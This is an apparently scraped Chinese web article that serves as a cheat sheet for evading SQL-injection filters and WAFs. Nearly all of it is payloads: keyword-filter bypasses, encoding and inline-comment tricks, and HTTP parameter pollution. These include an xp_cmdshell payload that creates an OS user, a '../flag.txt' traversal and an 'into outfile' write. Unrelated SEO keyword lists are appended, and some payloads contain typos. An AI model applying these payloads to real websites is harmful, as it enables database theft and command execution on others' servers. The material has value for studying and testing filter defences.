SQL注入绕过的知识点有哪些
发表于:2025-11-15 作者:千家信息网编辑
千家信息网最后更新 2025年11月15日,这篇文章主要介绍SQL注入绕过的知识点有哪些,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!一、 绕过waf思路从第一步起,一点一点去分析,然后绕过。1、过滤 and,orpre
千家信息网最后更新 2025年11月15日SQL注入绕过的知识点有哪些
这篇文章主要介绍SQL注入绕过的知识点有哪些,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!
一、 绕过waf思路
从第一步起,一点一点去分析,然后绕过。
1、过滤 and,or
preg_match('/(and|or)/i', $id)Filtered injection: 1 or 1 = 1 1 and 1 = 1Bypassed injection: 1 || 1 = 1 1 && 1 = 12、过滤 and, or, union
preg_match('/(and|or|union)/i', $id)Filtered injection: union select user, password from usersBypassed injection: 1 || (select user from users where user_id = 1) = 'admin'3、过滤 and, or, union, where
preg_match('/(and|or|union|where)/i', $id)Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'Bypassed injection: 1 || (select user from users limit 1) = 'admin'4、过滤 and, or, union, where, limit
preg_match('/(and|or|union|where|limit)/i', $id)Filtered injection: 1 || (select user from users limit 1) = 'admin'Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'5、过滤 and, or, union, where, limit, group by
preg_match('/(and|or|union|where|limit|group by)/i', $id)Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 16、过滤 and, or, union, where, limit, group by, select
preg_match('/(and|or|union|where|limit|group by|select)/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'Bypassed injection: 1 || substr(user,1,1) = 'a'7、过滤 and, or, union, where, limit, group by, select, '
preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || user_id is not nullBypassed injection: 1 || substr(user,1,1) = 0x61Bypassed injection: 1 || substr(user,1,1) = unhex(61)8、过滤 and, or, union, where, limit, group by, select, ', hex
preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)Filtered injection: 1 || substr(user,1,1) = unhex(61)Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))9、过滤 and, or, union, where, limit, group by, select, ', hex, substr
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))Bypassed injection: 1 || lpad(user,7,1)10、过滤 and, or, union, where, limit, group by, select, ', hex, substr, 空格
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)Filtered injection: 1 || lpad(user,7,1)ypassed injection: 1||lpad(user,7,1)二、正则绕过
根据正则的的模糊匹配特性绕过,比如过滤了'='
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1,1 or '1',1 or char(97)
eg:filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7aBypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
三、通用绕过
1.注释符
?id=1+un//ion+se//lect+1,2,3-
2.大小写
?id=1+UnIoN//SeLecT//1,2,3-
3.关键字替换
有些waf等使用preg_replace替换了SQL关键字
?id=1+UNunionION+SEselectLECT+1,2,3--?id=1+union+select+1,2,3--
有时候注释符'/**/'可能被过滤,也可以使用绕过
Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).htmlBypassed : http://localhost/id/1||lpad(first_name,7,1).html
4.编码
一个经典的脚本:Nukesentinel.php
// Check for UNION attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[1]; if($blocker_row['activate'] > 0) { if (stristr($nsnst_const['query_string'],'+union+') OR \ stristr($nsnst_const['query_string'],'%20union%20') OR \ stristr($nsnst_const['query_string'],'*/union/*') OR \ stristr($nsnst_const['query_string'],' union ') OR \ stristr($nsnst_const['query_string_base64'],'+union+') OR \ stristr($nsnst_const['query_string_base64'],'%20union%20') OR \ stristr($nsnst_const['query_string_base64'],'*/union/*') OR \ stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); die("BLOCK IP 1 " ); } }Forbidden: http://localhost/php/?/**/union/**/selectBypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/selectBypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect
5.缓冲区溢出
http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10-
6.内联注释(mysql)
http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
四、高级绕过
1.HPP(http参数污染)
举个例子:
index.php?par1=val1&par1=val2| web server | par1 || :- | :- || ASP.NET/IIS | val1,val2 || ASP/IIS | val1,val2 || PHP/Apache | val2 || JSP/Tomcat | val1 |
eg:
在ASP/ASP.NET的环境下
Forbidden: http://localhost/search.aspx?q=select name,password from usersBypassed : http://localhost/search.aspx?q=select name&q=password from usersBypassed : http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/usersBypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --
2.HPC(http参数污染)
RFC2396定义了如下一些字符:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()Reserved : ; / ? : @ & = + $ ,Unwise : { } | \ ^ [ ] `不同的Web服务器处理处理构造得特殊请求时有不同的逻辑:
| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP || :- | :- | :- || ?test[1=2 | test_1=2 | test[1=2 || ?test=% | test=% | test= || ?test=1 | test= | test=1 || ?test=11 | NULL | test=1 || ?test+d=1+2 | test_d=1 2 | test d=1 2 |
eg:
Forbidden: http://localhost/?xp_cmdshellBypassed : http://localhost/?xp[cmdshellForbidden: http://localhost/test.asp?file=../flag.txtBypassed : http://localhost/test.asp?file=.%./flag.txtForbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
以上是"SQL注入绕过的知识点有哪些"这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注行业资讯频道!
知识
注释
知识点
不同
关键
关键字
内容
参数
正则
篇文章
处理
污染
特殊
高级
价值
例子
兴趣
大小
字符
小伙
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
项目分析需要什么软件开发
维护网络安全的政治教育
scum重置服务器需要多久
装甲联队如何找回服务器
软件开发测试 游戏测试
软件工程(数据库技术方向)
太仓网络技术质量保证
java 全表导入数据库
服务器管理缺少角色
数据库的驱动名
软件开发测试产品搞笑图片
华为软件开发岗做什么的
电脑网络安全密匙什么意思
网络安全管理人员的职责
区网络安全工作考核评价办法
pg数据库快照
浦发银行软件开发面试经验
杨浦区网络技术开发售价
网络安全课程设计报告书
服务器存储数据库对人体的影响
银行做软件开发怎么用
旧金山软件开发待遇
方舟服务器怎么开起管理员
网络安全法三个不发生
查询mc服务器在线玩家id
佛山服务器滑轨哪家性价比高
网络技术发展的非常快
梁平区综合软件开发服务代理商
数据库消息547
手机一直显示服务器安全证书
